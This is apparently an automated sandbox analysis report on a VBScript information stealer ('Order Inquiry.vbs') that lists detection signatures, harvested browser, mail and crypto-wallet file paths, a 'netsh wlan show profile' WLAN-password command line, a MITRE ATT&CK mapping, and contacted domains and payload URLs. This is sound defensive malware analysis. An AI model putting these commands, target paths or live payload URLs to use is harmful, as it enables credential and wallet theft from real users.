          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Uses netsh to modify the Windows network and firewall settings
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: AddInProcess32.exe, 00000009.00000002.1735664078.000000000616C000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1674833738.00000000014D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected PXRECVOWEIWOEI Stealer
          Source: Yara matchFile source: 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 8168, type: MEMORYSTR
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000300D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
          Source: AddInProcess32.exe, 00000009.00000002.1735664078.000000000616C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: BERT-PC\root\cimv2:Win32_Product.IdentifyingNumber="{4A03706F-666A-4037-7777-5F2748764D10}",Name="Java Auto Updater",Version="2.8.381.9"Jaxx
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000300D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000300D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000300D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-
          Source: powershell.exe, 00000003.00000002.1993317728.00007FFB4B1A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
          Opens network shares
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: \\tsclient\C\Program Files\
          Source: C:\Windows\System32\cmd.exeFile opened: \\tsclient\C\Program Files\aburrar.vbs
          Source: C:\Windows\System32\cmd.exeFile opened: \\tsclient\C\Program Files\aburrar.vbs
          Tries to harvest and steal WLAN passwords
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key3.db
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 8168, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected PXRECVOWEIWOEI Stealer
          Source: Yara matchFile source: 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 8168, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information221
          Scripting          		Valid Accounts131
          Windows Management Instrumentation          		221
          Scripting          		1
          DLL Side-Loading          		11
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          DLL Side-Loading          		311
          Process Injection          		3
          Obfuscated Files or Information          		LSASS Memory34
          System Information Discovery          		Remote Desktop Protocol2
          Data from Local System          		1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts11
          Command and Scripting Interpreter          		11
          Registry Run Keys / Startup Folder          		11
          Registry Run Keys / Startup Folder          		1
          Software Packing          		Security Account Manager1
          Network Share Discovery          		SMB/Windows Admin Shares1
          Email Collection          		11
          Encrypted Channel          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts3
          PowerShell          		Login HookLogin Hook1
          DLL Side-Loading          		NTDS451
          Security Software Discovery          		Distributed Component Object Model1
          Clipboard Data          		3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading          		LSA Secrets1
          Process Discovery          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts161
          Virtualization/Sandbox Evasion          		Cached Domain Credentials161
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
          Process Injection          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          System Network Configuration Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1457271 Sample: Order Inquiry.vbs Startdate: 14/06/2024 Architecture: WINDOWS Score: 100 45 paste.ee 2->45 47 uploaddeimagens.com.br 2->47 49 4 other IPs or domains 2->49 71 Multi AV Scanner detection for domain / URL 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 Antivirus detection for URL or domain 2->75 79 13 other signatures 2->79 11 wscript.exe 14 2->11         started        15 msiexec.exe 2->15         started        signatures3 77 Connects to a pastebin service (likely for C&C) 45->77 process4 dnsIp5 59 uploaddeimagens.com.br 188.114.97.3, 443, 49706, 49707 CLOUDFLARENETUS European Union 11->59 99 System process connects to network (likely due to code injection or exploit) 11->99 101 VBScript performs obfuscated calls to suspicious functions 11->101 103 Suspicious powershell command line found 11->103 105 5 other signatures 11->105 17 powershell.exe 7 11->17         started        signatures6 process7 signatures8 65 Suspicious powershell command line found 17->65 67 Found many strings related to Crypto-Wallets (likely being stolen) 17->67 69 Found suspicious powershell code related to unpacking or dynamic code loading 17->69 20 powershell.exe 15 16 17->20         started        24 conhost.exe 17->24         started        process9 dnsIp10 51 93.123.39.71, 49709, 80 NET1-ASBG Bulgaria 20->51 81 Creates autostart registry keys with suspicious values (likely registry only malware) 20->81 83 Writes to foreign memory regions 20->83 85 Opens network shares 20->85 87 Injects a PE file into a foreign processes 20->87 26 AddInProcess32.exe 14 38 20->26         started        30 cmd.exe 1 20->30         started        signatures11 process12 dnsIp13 53 ip-api.com 208.95.112.1, 54305, 80 TUT-ASUS United States 26->53 55 icanhazip.com 104.16.185.241, 54304, 80 CLOUDFLARENETUS United States 26->55 57 whatismyipaddressnow.co 188.114.96.3, 443, 49710, 49713 CLOUDFLARENETUS European Union 26->57 89 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->89 91 Tries to steal Mail credentials (via file / registry access) 26->91 93 Found many strings related to Crypto-Wallets (likely being stolen) 26->93 97 4 other signatures 26->97 32 cmd.exe 1 26->32         started        95 Opens network shares 30->95 35 conhost.exe 30->35         started        signatures14 process15 signatures16 61 Uses netsh to modify the Windows network and firewall settings 32->61 63 Tries to harvest and steal WLAN passwords 32->63 37 netsh.exe 2 32->37         started        39 conhost.exe 32->39         started        41 findstr.exe 1 32->41         started        43 chcp.com 1 32->43         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Order Inquiry.vbs5%VirustotalBrowse
          Order Inquiry.vbs0%ReversingLabs

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          paste.ee1%VirustotalBrowse
          whatismyipaddressnow.co6%VirustotalBrowse
          ip-api.com0%VirustotalBrowse
          uploaddeimagens.com.br5%VirustotalBrowse
          75.103.13.0.in-addr.arpa0%VirustotalBrowse
          icanhazip.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          http://x1.c.lencr.org/00%URL Reputationsafe
          http://x1.i.lencr.org/00%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          http://ip-api.com0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          https://aka.ms/pscore680%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
          http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
          https://aka.ms/pscore60%Avira URL Cloudsafe
          https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
          https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
          https://analytics.paste.ee0%Avira URL Cloudsafe
          https://go.microsoft.co0%Avira URL Cloudsafe
          http://icanhazip.com/0%Avira URL Cloudsafe
          https://chrome.google.com/webstore?hl=enWeb0%Avira URL Cloudsafe
          https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
          https://paste.ee/d/3dasY0%Avira URL Cloudsafe
          https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh0%Avira URL Cloudsafe
          https://www.oracle.com/technetwork/java/javase/downloads0%Avira URL Cloudsafe
          https://www.google.com0%Avira URL Cloudsafe
          http://93.123.39.71/sword.txt100%Avira URL Cloudmalware
          https://paste.ee/d/3dasY00%Avira URL Cloudsafe
          http://icanhazip.com0%Avira URL Cloudsafe
          https://cdnjs.cloudflare.com0%Avira URL Cloudsafe
          https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
          https://paste.ee/d/3dasY40%Avira URL Cloudsafe
          https://secure.gravatar.com0%Avira URL Cloudsafe
          https://www.office.com/0%Avira URL Cloudsafe
          https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
          https://paste.ee/d/3dasY$0%Avira URL Cloudsafe
          https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l0%Avira URL Cloudsafe
          https://www.google.com;0%Avira URL Cloudsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
          https://www.office.com/Office0%Avira URL Cloudsafe
          http://crl.rootca1.amazontrust.com/rootca1.crl00%Avira URL Cloudsafe
          https://chrome.google.com/webstore?hT0%Avira URL Cloudsafe
          http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%Avira URL Cloudsafe
          https://www.office.com/LR0%Avira URL Cloudsafe
          https://github.com/Pester/Pester0%Avira URL Cloudsafe
          https://uploaddeimagens.com.br0%Avira URL Cloudsafe
          https://paste.ee/_0%Avira URL Cloudsafe
          https://whatismyipaddressnow.co/API/FETCH/getcountry.php0%Avira URL Cloudsafe
          https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?17182841380%Avira URL Cloudsafe
          https://paste.ee/d/3dasYz0%Avira URL Cloudsafe
          http://crt.rootca1.amazontrust.com/rootca1.cer0?0%Avira URL Cloudsafe
          https://analytics.paste.ee;0%Avira URL Cloudsafe
          https://support.mozilla.org0%Avira URL Cloudsafe
          http://whatismyipaddressnow.co0%Avira URL Cloudsafe
          https://paste.ee/H0%Avira URL Cloudsafe
          https://themes.googleusercontent.com0%Avira URL Cloudsafe
          https://whatismyipaddressnow.co0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          paste.ee
          		188.114.97.3
          		truetrueunknown
          whatismyipaddressnow.co
          		188.114.96.3
          		truefalseunknown
          ip-api.com
          		208.95.112.1
          		truetrueunknown
          uploaddeimagens.com.br
          		188.114.97.3
          		truetrueunknown
          icanhazip.com
          		104.16.185.241
          		truefalseunknown
          75.103.13.0.in-addr.arpa
          		unknown
          		unknowntrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://icanhazip.com/false
          • Avira URL Cloud: safe
          		unknown
          https://paste.ee/d/3dasYtrue
          • Avira URL Cloud: safe
          		unknown
          https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7whtrue
          • Avira URL Cloud: safe
          		unknown
          http://93.123.39.71/sword.txtfalse
          • Avira URL Cloud: malware
          		unknown
          https://whatismyipaddressnow.co/API/FETCH/getcountry.phptrue
          • Avira URL Cloud: safe
          		unknown
          https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138true
          • Avira URL Cloud: safe
          		unknown
          http://ip-api.com/line/?fields=hostingfalse
          • URL Reputation: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://duckduckgo.com/chrome_newtabAddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://duckduckgo.com/ac/?q=AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://go.microsoft.copowershell.exe, 00000003.00000002.1977414907.000001E4E7D10000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://analytics.paste.eewscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://aka.ms/pscore6powershell.exe, 00000003.00000002.1937420985.000001E4CFCF9000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • URL Reputation: safe
          		unknown
          https://chrome.google.com/webstore?hl=enAddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030C2000.00000004.00000800.00020000.00000000.sdmp, tmp7752.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://chrome.google.com/webstore?hl=enWebtmp7752.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.google.comwscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.oracle.com/technetwork/java/javase/downloadsAddInProcess32.exe, 00000009.00000002.1735664078.000000000616C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://x1.c.lencr.org/0cert9.db.9.drfalse
          • URL Reputation: safe
          		unknown
          http://x1.i.lencr.org/0cert9.db.9.drfalse
          • URL Reputation: safe
          		unknown
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • URL Reputation: safe
          		unknown
          http://ip-api.comAddInProcess32.exe, 00000009.00000002.1681596776.000000000307E000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://paste.ee/d/3dasY0wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdnjs.cloudflare.comwscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://icanhazip.comAddInProcess32.exe, 00000009.00000002.1681596776.000000000302E000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://paste.ee/d/3dasY4wscript.exe, 00000000.00000003.1409306033.00000260C2CFD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411281235.00000260C2D37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410321938.00000260C2D37000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1937420985.000001E4CFD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1706558041.0000021CD8EF1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://secure.gravatar.comwscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.office.com/AddInProcess32.exe, 00000009.00000002.1681596776.00000000034CE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.0000000003054000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030C2000.00000004.00000800.00020000.00000000.sdmp, tmpE8C2.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.google.com/images/branding/product/ico/googleg_lodp.icoAddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://paste.ee/d/3dasY$wscript.exe, 00000000.00000003.1408406314.00000260C4BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409759305.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6ltmpB97.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.google.com;wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.office.com/OfficetmpE8C2.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://crl.rootca1.amazontrust.com/rootca1.crl0cert9.db.9.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://chrome.google.com/webstore?hTAddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://ocsp.rootca1.amazontrust.com0:cert9.db.9.drfalse
          • Avira URL Cloud: safe
          		unknown
